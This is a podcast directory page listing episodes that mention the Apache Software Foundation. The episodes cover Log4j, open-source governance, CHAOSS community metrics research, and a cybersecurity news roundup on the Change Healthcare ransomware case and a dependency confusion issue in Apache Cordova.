Podcasts about The Apache Software Foundation

  • 94PODCASTS
  • 125EPISODES
  • 40mAVG DURATION
  • 1MONTHLY NEW EPISODE
  • May 13, 2025LATEST

POPULARITY

20172018201920202021202220232024


Best podcasts about The Apache Software Foundation

Latest podcast episodes about The Apache Software Foundation

Hacking Humans
Log4j vulnerability (noun) [Word Notes]

Hacking Humans

Play Episode Listen Later May 13, 2025 9:16


Please enjoy this encore of Word Notes. An open source Java-based software tool available from the Apache Software Foundation designed to log security and performance information.  CyberWire Glossary link: ⁠https://thecyberwire.com/glossary/log4j⁠ Audio reference link: “⁠CISA Director: The LOG4J Security Flaw Is the ‘Most Serious' She's Seen in Her Career⁠,” by Eamon Javers (CNBC) and Jen Easterly (Cybersecurity and Infrastructure Security Director) YouTube, 20 December 20 2021.

Word Notes
Log4j vulnerability (noun)

Word Notes

Play Episode Listen Later May 13, 2025 9:16


Please enjoy this encore of Word Notes. An open source Java-based software tool available from the Apache Software Foundation designed to log security and performance information.  CyberWire Glossary link: ⁠https://thecyberwire.com/glossary/log4j⁠ Audio reference link: “⁠CISA Director: The LOG4J Security Flaw Is the ‘Most Serious' She's Seen in Her Career⁠,” by Eamon Javers (CNBC) and Jen Easterly (Cybersecurity and Infrastructure Security Director) YouTube, 20 December 20 2021. Learn more about your ad choices. Visit megaphone.fm/adchoices

Founders Unfiltered
Ep 124: The Sri Lankan Unicorn ft. WSO2

Founders Unfiltered

Play Episode Listen Later Feb 9, 2025 54:59


Brought to you by the Founders Unfiltered podcast by A Junior VC - Unscripted conversations with Indian founders about their story and the process of building a company. Hosted by Aviral and Mazin.Join us as we talk to Sanjiva Weerawarana, the founder of WSO2 about their story.Sanjiva earned his bachelor's and master's in Mathematics/CS from Kent State University, Ohio, and later completed a Ph.D. in Computer Science at Purdue University.He worked as a Research Staff Member at IBM and held visiting professorships at Purdue University, the Polytechnic Institute of New York University, and the University of Moratuwa.Beyond academia, he served on various committees, including the Arthur C. Clarke Institute, the University of Colombo, the University Grants Commission, The Apache Software Foundation, and several Sri Lankan institutions in technology, finance, and science.He founded multiple organizations, including WSO2 (2005), Thinkcube Systems, Sahana Software Foundation, Lanka Software Foundation, Lanka Data Foundation, and Avinya Foundation.Interestingly, he also served as a Lieutenant Colonel in the Sri Lanka Army.

Burning Man LIVE
A People's History of Burning Man - Volume 3

Burning Man LIVE

Play Episode Listen Later Dec 24, 2024 59:58


Back again by popular demand, here are more tales from Burning Man's oral history project, an ambitious endeavor to track down and talk with people who helped shape the culture as we now know it.Stuart and Andie share stories of early technology on the playa, and on the internet.Andie Grace aka Actiongrl interviews from the vantage of having co-created Burning Man's world of communications, from Media Mecca to this very podcast.Brian Behlendorf - technologist and open-source software pioneer. He developed Burning Man's online presence and connected people through the venn diagram of luminaries from SF Raves, to Wired Magazine to the Apache Software Foundation.David Beach - designer, creative director, and instigator of the impossible with early dynamic content on the web. He helped create Burning Man's first live streaming and web presence.Scott Beale - documentarian, founder of Laughing Squid, subculture super-connector of various tentacles of the meta-scene.Stuart Magrum - zinester, cacophonist, billboard liberator, Minister of Propaganda, Director of the Philosophical Center, publisher of the first on-site newspaper of Burning Man (the Black Rock Gazette), and always in the same place at the same time as the characters in these stories of Burning Man's media experiments.Andie GraceBrian BehlendorfDavid BeachScott BealeStuart MangrumLaughing Squid: Burning Man 1996 Netcastdispatch2023.burningman.orgjournal.burningman.org/philosophical-centerburningman.org/programs/philosophical-centerBurning Man Live: A People's History of Burning Man - Volume 2Burning Man Live: A People's History of Burning Man - Volume 1 LIVE.BURNINGMAN.ORG

FeatherCast
Justin Mclean – ASF Board of Directors

FeatherCast

Play Episode Listen Later Sep 26, 2024 2:22


Are you interested in being a board member at the ASF? Justin Mclean is currently serving his fourth term as a board member at the Apache Software Foundation. In this short clip, he talks about his role there. Prefer video? …

The Cloud Gambit
Navigating Community, Open Source, and Brazilian Jiu-Jitsu with Tim Banks

The Cloud Gambit

Play Episode Listen Later Sep 24, 2024 59:52 Transcription Available


Send us a textIn this episode, we dive deep into the multifaceted world of Tim Banks, a Staff Solutions Architect at Caylent. Tim shares his remarkable journey from the US Marine Corps to becoming a prominent voice in the tech community. We explore the parallels between his experiences in tech, Brazilian Jiu-Jitsu, and community building, uncovering valuable insights on personal growth, professional development, and the state of open source. Whether you're a seasoned tech professional, a community organizer, or someone looking to break into the industry, this episode offers valuable insights on navigating the complex landscape of technology, community, and personal growth.Where to Find Tim BanksTwitter: https://x.com/elchefeLinkedIn: https://www.linkedin.com/in/timjb/GitHub: https://github.com/timbanksYouTube: https://www.youtube.com/@elchefenegroTikTok: https://www.tiktok.com/@timbanks71Blog: https://tim-banks.ghost.io/Show LinksCaylent: https://caylent.com/CNCF: https://www.cncf.io/Apache Software Foundation: https://www.apache.org/DevOpsDays: https://devopsdays.org/Elastic License Change: https://www.elastic.co/blog/elastic-license-v2OpenSearch (Amazon's Elasticsearch Fork): https://opensearch.org/Follow, Like, and Subscribe!Podcast: https://www.thecloudgambit.com/YouTube: https://www.youtube.com/@TheCloudGambitLinkedIn: https://www.linkedin.com/company/thecloudgambitTwitter: https://twitter.com/TheCloudGambitTikTok: https://www.tiktok.com/@thecloudgambit

FeatherCast
Stefan Vodita: TAC recipient

FeatherCast

Play Episode Listen Later Sep 23, 2024 5:10


The Travel Assistance Committee (TAC) is a program at the Apache Software Foundation that helps cover the expenses of attending an ASF event, such as Community Over Code in Bratislava, where I interviewed Stefan Vodita, one of the recipients for …

FeatherCast
Shane Curcuru – Being a PMC Chair

FeatherCast

Play Episode Listen Later Aug 19, 2024 6:29


PMCs – Project Management Committees – at the Apache Software Foundation have a PMC Chair, who is a Vice President of the Foundation. And while that sounds very fancy and powerful, it's really not. Shane Curcuru, the PMC Chair of …

DeCent People
Ian LeWinter and Chris Davis

DeCent People

Play Episode Listen Later Jun 25, 2024 57:11


Ian is co-founder and president of Ingredient X, the film and software development studio specializing in blockchain, DeFi and NFT technologies including the creation of Film.io, a decentralized filmmaking ecosystem that places Hollywood decision-making onto the blockchain and into the hands of creators and fans.Chris, co-founder and CTO of Ingredient X, was a pioneer in the early days of WordPress and is a member of the Infrastructure team for the Apache Software Foundation.Follow Decential Media: Website: https://www.decential.io/Youtube: https://www.youtube.com/@decentialmediaInstagram: https://www.instagram.com/decential_mediaTiktok: https://www.tiktok.com/@decential_mediaLinkedIn: https://www.linkedin.com/company/decential-media/Newsletter: https://decential.beehiiv.com/ Follow Matt Leising: https://twitter.com/mattleisingSee Privacy Policy at https://art19.com/privacy and California Privacy Notice at https://art19.com/privacy#do-not-sell-my-info.

FeatherCast
Ivet Petrova Madzharova, Apache Cloudstack PMC member

FeatherCast

Play Episode Listen Later Jun 24, 2024 3:53


At the recent Community Over Code, in Bratislava, I had a number of conversations with people in various roles at the Apache Software Foundation. One of these was with Ivet Petrova Madzharova, marketing lead for Apache Cloustack. We talked about …

FeatherCast
Philipp Ottlinger talks about TAC, being a PMC Chair, and getting involved in open source

FeatherCast

Play Episode Listen Later Jun 21, 2024 5:36


At the recent Community Over Code event in Bratislava I had a series of conversations with participants from across the Apache Software Foundation about how and why they got involved, and how you can get involved. Philipp Ottlinger is a …

FeatherCast
Brian Proffitt – VP Marketing & Press at the Apache Software Foundation

FeatherCast

Play Episode Listen Later Jun 12, 2024


Have you ever considered getting involved at the Apache Software Foundation, but aren't sure where to get started? No matter what your skills are, there's a place for you. At Community Over Code in Bratislava, I spoke with Brian Proffitt, …

OpenObservability Talks
FOSS in Flux: Redis Relicensing and the Future of Open Source: OpenObservability Talks S4E12

OpenObservability Talks

Play Episode Listen Later May 30, 2024 61:35


In the past few years we've been witnessing tectonic shifts in the open source realm, with established projects taken off open source or otherwise turning to the dark side. On the other hand, we've seen active forks aiming to keep these projects open gaining momentum. What does it mean for the Free and Open Source Software (FOSS) movement? Is this a trend or just a passing wave? What can we learn from it as vendors and as a community? In this special episode concluding the fourth season of OpenObservability talks we will look back at the past year, including the very recent relicensing of Redis, and will discuss the state of open source with the help of open source pundit David Nalley. David has been involved in open source for nearly two decades. He is the director of open source strategy at AWS and currently serves as the President of the Apache Software Foundation and serves on the Board of Directors for the Internet Security Research Group. The episode was live-streamed on 28 May 2024 and the video is available at https://www.youtube.com/watch?v=WV0ESadKuVI OpenObservability Talks episodes are released monthly, on the last Thursday of each month and are available for listening on your favorite podcast app and on YouTube. We live-stream the episodes on Twitch and YouTube Live - tune in to see us live, and chime in with your comments and questions on the live chat. ⁠⁠https://www.youtube.com/@openobservabilitytalks⁠   https://www.twitch.tv/openobservability⁠ Show Notes: 00:00 - Show intro and fourth season ending 00:55 - Episode and guest intro 09:50 - Redis relicensing off open source  16:34 - is vendor-owned open source an oxymoron? 20:00 - building business plan around open source 27:52 - what it means for users when a project relicenses 35:08 - Open Source is more than licenses and copyright 42:19 - Forks of relicensed projects to keep them open 49:55 - Open source strategy at AWS 53:39 - The role of OSS foundations 58:59 - upcoming Community Over Code and KCD Czech and Slovak   1:00:01 - Outro Resources: Open Source Definition: https://opensource.org/osd The Four Opens (Open Infra): https://openinfra.dev/four-opens/ Is Vendor Owned Open Source An Oxymoron? https://horovits.medium.com/b5486a4de1c6  Redis is no longer open source: https://www.linkedin.com/posts/horovits_opensource-srecon-activity-7176599258156986369-3tJm/  Initiating the Valkey fork of Redis: https://www.linkedin.com/posts/horovits_redis-opensource-activity-7179186700470861824-Gghq/  Socials: Twitter:⁠ https://twitter.com/OpenObserv⁠ YouTube: ⁠https://www.youtube.com/@openobservabilitytalks⁠ Dotan Horovits ============ Twitter: @horovits LinkedIn: in/horovits Mastodon: @horovits@fosstodon David Nalley ========== Twitter: https://x.com/ke4qqq LinkedIn: https://www.linkedin.com/in/davidnalley/

CHAOSScast
Episode 82: The AI Conundrum: Implications for OSPOs

CHAOSScast

Play Episode Listen Later Apr 25, 2024 39:16


In this episode of CHAOSScast, host Dawn Foster brings together Matt Germonprez, Brian Proffitt, and Ashley Wolf to discuss the implications of Artificial Intelligence (AI) on Open Source Program Offices (OSPOs), including policy considerations, the potential for AI-driven contributions to create workload for maintainers, and the quality of contributions. They also touch on the use of AI internally within companies versus contributing back to the open source community, the importance of distinguishing between human and AI contributions, and the potential benefits and challenges AI introduces to open source project health and community metrics. The conversation strikes a balance between optimism for AI's benefits and caution for its governance, leaving us to ponder the future of open source in an AI-integrated world. Press download to hear more! [00:03:20] The discussion begins on the role of OSPOs in AI policy making, and Ashley emphasizes the importance of OSPOs in providing guidance on generative AI tools usage and contributions within their organizations. [00:05:17] Brian observes a conservative reflex towards AI in OSPOs, noting issues around copyright, trust, and the status of AI as not truly open source. [00:07:10] Matt inquires about aligning different policies from various organizations, like GitHub and Red Hat, with those from the Linux Foundation and Apache Software Foundation regarding generative AI. Brian speaks about Red Hat's approach to first figure out their policies before seeking alignment with others. [00:06:45] Ashley appreciates the publicly available AI policies from the Apache and Linux Foundations, noting that GitHub's policies have been informed by long-term thinking and community feedback. [00:10:34] Dawn asks about potential internal conflict for GitHub employees given different AI policies at GitHub and other organizations like CNCF and Apache. [00:12:32] Ashley and Brian talk about what they see as the benefits of AI for OSPOs, and how AI can help scale OSPO support and act as a sounding board for new ideas. [00:15:32] Matt proposes a scenario where generative AI might increase individual contributions to high-profile projects like Kubernetes for personal gain, potentially burdening maintainers. [00:18:45] Dawn mentions Daniel Stenberg of cURL who has seen an influx of low-quality issues from AI models, Ashley points out the problem of “drive-by-contributions” and spam, particularly during events like Hacktoberfest, and emphasizes the role of OSPOs in education about responsible contributions, and Brian discusses potential issues with AI contributions leading to homogenization and the increased risk of widespread security vulnerabilities. [00:22:33] Matt raises another scenario questioning if companies might use generative AI internally as an alternative to open source for smaller issues without contributing back to the community. Ashley states 92% of developers are using AI code generation tools and cautions against creating code in a vacuum, and Brian talks about Red Hat's approach. [00:27:18] Dawn discusses the impact of generative AI on companies that are primarily consumers of open source, rarely contributing back, questioning if they might start using AI to make changes instead of contributing. Brian suggests there might be a mixed impact and Ashley optimistically hopes the time saved using AI tools will be redirected to contribute back to open source. [00:29:49] Brian discusses the state of open source AI, highlighting the lack of a formal definition and ongoing efforts by the OSI and other groups to establish one, and recommends a fascinating article he read from Knowing Machines. Ashley emphasizes the importance of not misusing the term open source for AI until a formal definition is established. [00:32:42] Matt inquires how metrics can aid in adapting to AI trends in open source, like detecting AI-generated contributions. Brian talks about using signals like time zones to differentiate between corporate contributors and hobbyists, and the potential for tagging contributions from AI for clarity. [00:35:13] Ashley considers the human aspect of maintainers dealing with an influx of AI-generated contributions and what metrics could indicate a need for additional support, and she mentions the concept of the “Nebraska effect.” Value Adds (Picks) of the week: [00:36:59] Dawn's pick is seeing friends over the 4 day UK Easter holiday, playing board games, eating, and hanging out. [00:37:21] Brian's pick is traveling back home to Indiana to see his first ever total solar eclipse and bringing his NC friends along. [00:38:03] Matt's pick is reconnecting with colleagues this semester and doing talks at GSU and Syracuse. [00:38:40] Ashley's pick is going to the local nursery and acquiring some blueberry plants. Panelists: Dawn Foster Matt Germonprez Brian Proffitt Ashley Wolf Links: CHAOSS (https://chaoss.community/) CHAOSS Project X/Twitter (https://twitter.com/chaossproj?lang=en) CHAOSScast Podcast (https://podcast.chaoss.community/) podcast@chaoss.community (mailto:podcast@chaoss.community) Georg Link Website (https://georg.link/) Dawn Foster X/Twitter (https://twitter.com/geekygirldawn?lang=en) Matt Germonprez X/Twitter (https://twitter.com/germ) Brian Proffitt X/Twitter (https://twitter.com/TheTechScribe) Ashley Wolf X/Twitter (https://twitter.com/Meta_Ashley) Ashley Wolf LinkedIn (https://www.linkedin.com/in/ashleywolf/) AI-generated bug reports are becoming a big waste of time for developers (Techspot) (https://www.techspot.com/news/101440-ai-generated-bug-reports-waste-time-developers.html) Models All The Way Down- A Knowing Machines Project (https://knowingmachines.org/models-all-the-way) xkcd-Dependency (https://xkcd.com/2347/) Special Guest: Ashley Wolf.

The Daily Decrypt - Cyber News and Discussions
AI in Elections: Guarding Against Misinformation, UnitedHealth’s Ransomware Dilemma, and The Peril of Dependency Confusion in Apache Cordova

The Daily Decrypt - Cyber News and Discussions

Play Episode Listen Later Apr 24, 2024


Join us for a crucial discussion on AI's impact on U.S. elections and cybersecurity with insights from New York City Mayor Eric Adams and experts from Cloudflare and the Center for Internet Security. Discover how AI both threatens and protects our electoral integrity and what measures are being taken to combat misinformation and enhance security. In another essential segment, explore the recent ransom payment by UnitedHealth following a cyberattack on Change Healthcare. Learn about the challenges in protecting sensitive patient data and the implications of the breach on healthcare operations and cybersecurity policies. Finally, delve into the vulnerability of Apache Cordova App Harness in a dependency confusion attack as reported by Orca and Legit Security. Understand the risks of using outdated third-party projects in software development and the steps taken by the Apache security team to address these vulnerabilities. For more detailed information: https://www.helpnetsecurity.com/2024/04/23/ai-election-misinformation/ https://www.cybersecuritydive.com/news/unitedhealth-paid-ransom-change-cyberattack/714008/ https://thehackernews.com/2024/04/apache-cordova-app-harness-targeted-in.html Follow us on Instagram: https://www.instagram.com/the_daily_decrypt/ Thanks to Jered Jones for providing the music for this episode. https://www.jeredjones.com/ Logo Design by https://www.zackgraber.com/ Tags for the Episode AI, U.S. elections, cybersecurity, misinformation, Eric Adams, Cloudflare, Center for Internet Security, ransomware, UnitedHealth, Change Healthcare, data breach, Apache Cordova, dependency confusion attack, software security, open-source vulnerabilities Search Phrases for the Episode AI influence on US elections cybersecurity threats in 2024 elections Eric Adams on social media as environmental toxin UnitedHealth ransomware attack details handling sensitive patient data in healthcare cyberattacks Change Healthcare cyberattack impact dependency confusion attacks in software vulnerabilities in Apache Cordova App Harness combating misinformation with AI in elections protecting elections from cyber threats Transcript: Apr24 AI in Elections: Guarding Against Misinformation, UnitedHealth's Ransomware Dilemma, and The Peril of Dependency Confusion in Apache Cordova It's official. UnitedHealthcare has confirmed that it paid a ransom to the cybercriminals that breached its subsidiary ChangeHealthcare. What additional measures are UnitedHealth taking to monitor and mitigate the fallout from this breach? AI is swiftly becoming a double edged sword in U. S. elections, with over 60, 000 daily cyber threats being mitigated against election bodies as we approach the critical 2024 election cycle. How can we balance the advancement of AI technology with the security and fairness of upcoming elections? And finally, researchers have discovered a vulnerability in the discontinued Apache Cordova App Harness project, allowing attackers to inject malicious code into the software supply chain, impacting unsuspecting users worldwide. So you may have heard that Change Healthcare was breached, it caused a lot of problems, well it just came out that the UnitedHealth Group who owns Change Healthcare has admitted to paying a ransom during the cyber attack that occurred in February. Their aim was to prevent further exposure of sensitive patient data. A spokesperson for UnitedHealth revealed to Healthcare Dive that the breach involved protected health information and personally identifiable information which could potentially impact a vast number of Americans. Further complicating the situation, it was discovered that 22 screenshots of what appear to be stolen files were posted on the dark web. These images, some containing detailed patient health information, were accessible online for approximately one week. And anything that goes online, it's really hard to get it off. But UnitedHealth has confirmed its ongoing efforts to monitor the internet and dark web for any signs of the compromised data. The ransom payment details remain undisclosed. However, a UnitedHealth spokesperson emphasized that the payment was crucial to the company's strategy to safeguard patient information. Reports have been circulating about the ransom, with Wired Magazine last month suggesting that a known cyber group, ALF or Black Cat, received a payment that looked Suspiciously like a ransom transaction. Additionally, TechCrunch reported that another cyber group, RansomHub, has threatened further disclosures of sensitive records to extort money from UnitedHealth. So if you're not tracking that situation, there is an episode, I don't know, a month or so ago, that lays it out a little better. But BlackCat. is assumed to have performed an exit scam on the dark web and a new ransomware group called Ransomhub acquired the data? and is double extorting UnitedHealthcare. UnitedHealth reports that medical claims, processing, and payment systems are slowly returning to normal, with Change now handling about 86 percent of its pre incident payment volume. UnitedHealth anticipates that the financial toll from the cyberattack could reach 1. 6 billion this year. It is also unlikely that Change will fully recover to its standard service levels before 2025. So in the wake of the incident, major healthcare associations have reached out to the HHS office for civil rights, seeking clarification on who is responsible for issuing data breach notifications to avoid redundancy and confusion among patients. UnitedHealth is preparing to take on the breach reporting and notification responsibilities for all customers potentially affected by this incident, marking a critical phase in addressing the fallout from this significant data breach. So it's no secret that the introduction of artificial intelligence, or large language models, or machine learning, or whatever you want to call it, chat GPT, has really thrown a wrench into the content that's on the internet, from your advertisements, to actual news articles, to podcasts, to anything you consume is now probably being touched by large language models in one way or another. And this is going to have a huge effect. over the upcoming United States 2024 election cycle. As this election looms, the balance of power hangs between defending our digital frontiers and ensuring fair electoral processes. Recent reports from Cloudflare highlight the intensity of this battle, revealing over 60, 000 daily cyber threats against U. S. election bodies, which is a staggering number that underscores the global stakes within 70 elections in 40 countries also on the line this year. AI's dual nature presents a formidable challenge. It's a tool that can both safeguard and undermine the electoral process. The ease with which AI can fabricate convincing digital personas and disseminate misinformation across social platforms is alarming. This capability has turned social media into a double edged sword. prompting New York City Mayor Eric Adams to label it an environmental toxin. On the defense side, there is a pressing need for stringent AI regulation and robust cybersecurity measures. The Biden administration has responded by establishing a task force aimed at combating AI generated misinformation and bolstering public awareness about the potential misuses of this technology. The legislative landscape is also evolving, with states like Texas and California pioneering criminal penalties for the misuse of AI in political campaigns, several proposed bills in Congress seek to regulate AI more broadly. Check out the articles linked in our show notes for more information on that, it's a very interesting topic. tactic that these states are using against misuse of AI. To fortify our elections, experts suggest that political parties and candidates should consider appointing dedicated AI and data protection officers. This strategy parallels traditional physical security measures and is complemented by initiatives from organizations like the Center for Internet Security, which continues to refine tools that enhance the cybersecurity of election systems. Now, this isn't breaking news, but it continues to evolve as we get closer to the election, and we're not there yet. We're not in a place that we can confidently identify artificially created content and label it as such, or as untrue, or misleading, etc. Accurately. and The only way we'll ever be able to safeguard against this is with a foolproof method to do this labeling, remove the content from certain platforms, and just have an understanding of what constituents are consuming. We don't even have that. So we have a long way to go in the next coming months, and we'll try to keep you posted here on the Daily Decrypt. And finally, for our more technical folks, a concerning vulnerability has been uncovered in an archived Apache project known as Cordova App Harness. This vulnerability called a dependency confusion attack has researchers sounding the alarm. So dependency confusion attacks occur when package managers prioritize public repositories over private ones, allowing threat actors to sneak malicious packages into the mix. As a result, unsuspecting users may inadvertently download these fraudulent packages instead of the intended ones. So according to a report by the cloud security company Orca, nearly half of organizations are vulnerable to such attacks. That's a lot. While fixes have been implemented by NPM and other package managers to address this issue, the Cordova app harness project was found to have a vulnerability of its own. The project, which was discontinued by the Apache Software Foundation in 2019, lacked proper internal dependency referencing, leaving it wide open to supply chain attacks. The security firm LegitSecurity, sounds legit, demonstrated how easy it was to upload a malicious version of the dependency, attracting over 100 downloads before being detected. This incident serves as a stark reminder of the risks associated with using third party projects and dependencies, especially those that are no longer actively maintained. As security researcher Ofek Haviv points out, neglecting these projects can leave software systems vulnerable to exploitation. The Apache security team has since intervened by taking ownership of the vulnerable package. That's huge. But the episode underscores the importance of vigilance in software development practices. So we're going to continue to rely on open source projects, but it is crucial to prioritize security and regularly update dependencies to mitigate potential risks. That's all we got for you today. Thanks so much for listening. If you're a fan of the podcast, please turn to Instagram or YouTube or Twitter and give us a follow, a like, and Maybe a comment on one of the videos. We'd absolutely love to hear from you if you have any feedback, but until then, we will talk to you some more tomorrow.

FeatherCast
Lenny Primak: Apache Shiro

FeatherCast

Play Episode Listen Later Apr 19, 2024 14:29


Lenny Primak talks about Apache Shiro, the most recent release, and his journey at the Apache Software Foundation. Prefer video? That's on YouTube. Links: Project website: https://shiro.apache.org/ Github: https://github.com/apache/shiro

CHAOSScast
Episode 80: Counting Potatoes vs. Computational Mysticism - Using CHAOSS for Research

CHAOSScast

Play Episode Listen Later Feb 28, 2024 52:59


Thank you to the folks at Sustain (https://sustainoss.org/) for providing the hosting account for CHAOSSCast! CHAOSScast – Episode 79 In this episode, host Georg Link is joined by Daniel, Anita, Sophia, and Sean, to discuss their research experiences with CHAOSS metrics and software for open source community health analysis. They dive into various topics, such as collecting and interpreting data from different perspectives, considerations regarding privacy and ethics, and the importance of collaboration between academics and industry professionals. They also highlight some significant projects and studies where CHAOSS metrics and software were employed, and their hopes and concerns for the future direction of research in the field. Furthermore, they discuss the necessity of bridging the gap between academia and industry and touch on the importance of linguistics and cultural context when examining data. Download this episode now! [00:02:48] Anita discusses the history of open source software research and how CHAOSS provides a common framework for various metrics used by researchers, and Sean emphasizes the standardization of metrics by CHAOSS, which aids in consistency across research. [00:04:52] Sophia highlights the discrepancies in metric calculations and definitions, seeking standard methodologies, especially for non-academic publications, and Daniel reflects on the differences in research approaches between academia and industry, emphasizing the importance of methodological rigor. [00:08:25] Sean critiques academic papers for often lacking complete method descriptions, calling for a more rigorous methodological transparency, and Daniel shares about transitioning from academia to industry and the different expectations for communication and results. [00:10:44] Georg inquires about the impact of CHAOSS research capabilities, and Daniel explains that CHAOSS is shaping research by reflecting the interests and observations of its contributors. [00:12:16] Sean talks about the increased capacity for research offered by CHAOSS, particularly through tools like Grimoire Lab and Augur, Anita shares her experience using Grimoire Lab for creating interventions and dashboards for open source communities to monitor their projects, and Daniel adds historical context and mentions the importance of tools that allow the replication of analysis in research. [00:17:10] Georg introduces a study using CHAOSS metrics and software that hasn't been officially published yet, and Sophia shares some details and explains the study's premise. [00:21:00] Anita raises a philosophical point about the potential limitations of metrics, suggesting that they may only reflect what is observable and could lead to gamification if people optimize their behavior based on the metrics. [00:22:14] Sean speaks about the importance of deep field engagement and the combination of social science with data mining to fully understand the data's underlying human behavior. Sophia shares her perspective from market research, discussing the design of surveys, the selection bias inherent in data collection, and the importance of understanding the population that is excluded by the research filters used. [00:25:56] Anita discusses the challenges of academic surveys, and Daniel discusses the bias that may arise from the data available. [00:28:10] Sophia contemplates the behavioral nuances dictated by different platforms' processes, and Sean suggests a focus on common software engineering processes across different tools and advocates for social scientific research in open source to better understand the human aspects. [00:30:32] Georg transitions to discussing survey methodologies and their relation to CHAOSS metrics, and Anita shares her experiences with survey design for the international Apache Software Foundation community and implementation. [00:33:10] Daniel reflects on the collaborative effort with the ASF community to ensure the survey's terms and questions were appropriately adapted for an international audience. Sophia suggest the need for a consistent taxonomy is research to ensure cultural sensitivity and understanding. [00:36:15] Sean touches on the use of large language models in research to identify common language patterns, discussing the ethical considerations of using machine learning to evaluate inclusivity in projects. Anita shares thoughts on presenting survey data responsibly and the need for careful consideration of what information is shared. [00:38:53] Georg questions the future direction for research in open source using metrics and software. Sean advocates for deeper social scientific engagement, Anita points out the silos between industry and academics, highlighting the need for more interaction and collaboration to synergize efforts and ask more relevant questions, and Sophia stresses the need to focus on gaps in data and to consider work not visible in trace data. [00:42:59] Daniel brings a pessimistic view, cautioning that the different goals of industry and academia might lead to problems unless they find ways to work together more effectively. [00:44:11] Georg asks Daniel to clarify the problems he foresees with the current research trajectories. Daniel elaborates on the potential ethical and legal issues that may arise when data is used beyond the limits of fair use, such as in mental health analysis from developer messages, and Sean and Anita add some thoughts as well. Value Adds (Picks) of the week: [00:47:09] Georg's pick is baking cookies. [00:47:59] Sean's pick is a book he read called, “Language Variation and Change in Social Networks.” [00:48:31] Anita's pick is a book she is helping write on “Inclusive Open Source.” [00:48:59] Daniel's pick is two books he read called, “The Culture Map” and “From the Soil.” [00:50:54] Sophia's pick is returning to FOSDEM, seeing people, and learning about a new tool called, Cosma. Panelists: Georg Link Sean Goggins Daniel Izquierdo Anita Sarma Sophia Vargas Links: CHAOSS (https://chaoss.community/) CHAOSS Project X/Twitter (https://twitter.com/chaossproj?lang=en) CHAOSScast Podcast (https://podcast.chaoss.community/) podcast@chaoss.community (mailto:podcast@chaoss.community) Georg Link Website (https://georg.link/) Sean Goggins X/Twitter (https://twitter.com/sociallycompute) Sophia Vargas X/Twitter (https://twitter.com/Sophia_IV) Daniel Izquierdo X/Twitter (https://twitter.com/dizquierdo?lang=en) Anita Sarma LinkedIn (https://www.linkedin.com/in/anita-sarma-0a82972/) Mining Software Repositories (MSR) conference 2024 (https://2024.msrconf.org/) CHAOSSCon EU 2024-Brussels Livestream (YouTube) (https://www.youtube.com/watch?v=GkVKYpwh5QE) [Language Variation and Change in Social Networks by Robin Dodsworth and ](https://www.amazon.com/Language-variation-change-social-networks/dp/0367777509/ref=sr11?crid=1QIWW192YTPF9&keywords=language+variation+and+change+in+social+networks&qid=1707760093&sprefix=language+variation+and+change+in+social+network%2Caps%2C95&sr=8-1&ufe=appdo%3Aamzn1.fos.006c50ae-5d4c-4777-9bc0-4513d670b6bc)_ Richard A. Benton (https://www.amazon.com/Language-variation-change-social-networks/dp/0367777509/ref=sr_1_1?crid=1QIWW192YTPF9&keywords=language+variation+and+change+in+social+networks&qid=1707760093&sprefix=language+variation+and+change+in+social+network%2Caps%2C95&sr=8-1&ufe=app_do%3Aamzn1.fos.006c50ae-5d4c-4777-9bc0-4513d670b6bc) [The Culture Map by Erin Meyer](https://www.amazon.com/Culture-Map-INTL-ED-Decoding/dp/1610392760/ref=ascdf1610392760/?tag=hyprod-20&linkCode=df0&hvadid=312006100296&hvpos=&hvnetw=g&hvrand=2360770275112489683&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=9010754&hvtargid=pla-525261842565&psc=1&mcid=9b7b8fd217f835889defe4722f63242d&gclid=CjwKCAiAibeuBhAAEiwAiXBoJBGr1s2EFy9aFynuFkZtFljzCu52tbixiFUF5CLE0-dRDUnqTyxoC0zoQAvDBwE) [From the Soil: The Foundations of Chinese Society by Fei Xiaotong](https://www.amazon.com/Soil-Foundations-Chinese-Society/dp/0520077962/ref=ascdf0520077962/?tag=hyprod-20&linkCode=df0&hvadid=312519927002&hvpos=&hvnetw=g&hvrand=885018809096009679&hvpone=&hvptwo=&hvqmt=&hvdev=c&hvdvcmdl=&hvlocint=&hvlocphy=9010754&hvtargid=pla-523444788881&psc=1&mcid=6ced1276cd7539c8990cd0142445dc1c&gclid=CjwKCAiAibeuBhAAEiwAiXBoJKsXn6xkDBMHXN5bVs3ZexzCteUzUPsmQW-4V9nDt31OydD1OjhoCnYQQAvDBwE) Cosma-GitHub (https://github.com/graphlab-fr/cosma) “Counting Potatoes: the Size of Debian 2.2 “ (UPGRADE-Open Source/Free Software: Towards Maturity (https://robotica.unileon.es/vmo/pubs/upgrade.pdf) “Gaining Insight into Your Open Source Community with Community Tapestry” (write up for dashboard study for ASF) (https://docs.google.com/document/d/1VM9W2gKmh0AX4j_PSoghpqR6qkPuVjAdo_gkZZx8Imo/edit#heading=h.9ye7wft50hdx) Special Guest: Anita Sarma.

FeatherCast
Cassandra Summit: Mick Semb Wever

FeatherCast

Play Episode Listen Later Jan 17, 2024 11:15


At Cassandra Summit 2023, in San Jose California, I spoke with Mick Semb Wever about a variety of topics around the Cassandra Community, the new Cassandra Catalyst program, and open source at the Apache Software Foundation. Cassandra: https://cassandra.apache.org/ Cassandra Summit: …

Giant Robots Smashing Into Other Giant Robots
507 - Scaling New Heights: Innovating in Software Development with Merico's Founders Henry Yin and Maxim Wheatley

Giant Robots Smashing Into Other Giant Robots

Play Episode Listen Later Jan 11, 2024 44:42


In this episode of the "Giant Robots Smashing Into Other Giant Robots" podcast, host Victoria Guido delves into the intersection of technology, product development, and personal passions with her guests Henry Yin, Co-Founder and CTO of Merico, and Maxim Wheatley, the company's first employee and Community Leader. They are joined by Joe Ferris, CTO of thoughtbot, as a special guest co-host. The conversation begins with a casual exchange about rock climbing, revealing that both Henry and Victoria share this hobby, which provides a unique perspective on their professional roles in software development. Throughout the podcast, Henry and Maxim discuss the journey and evolution of Merico, a company specializing in data-driven tools for developers. They explore the early stages of Merico, highlighting the challenges and surprises encountered while seeking product-market fit and the strategic pivot from focusing on open-source funding allocation to developing a comprehensive engineering metric platform. This shift in focus led to the creation of Apache DevLake, an open-source project contributed to by Merico and later donated to the Apache Software Foundation, reflecting the company's commitment to transparency and community-driven development. The episode also touches on future challenges and opportunities in the field of software engineering, particularly the integration of AI and machine learning tools in the development process. Henry and Maxim emphasize the potential of AI to enhance developer productivity and the importance of data-driven insights in improving team collaboration and software delivery performance. Joe contributes to the discussion with his own experiences and 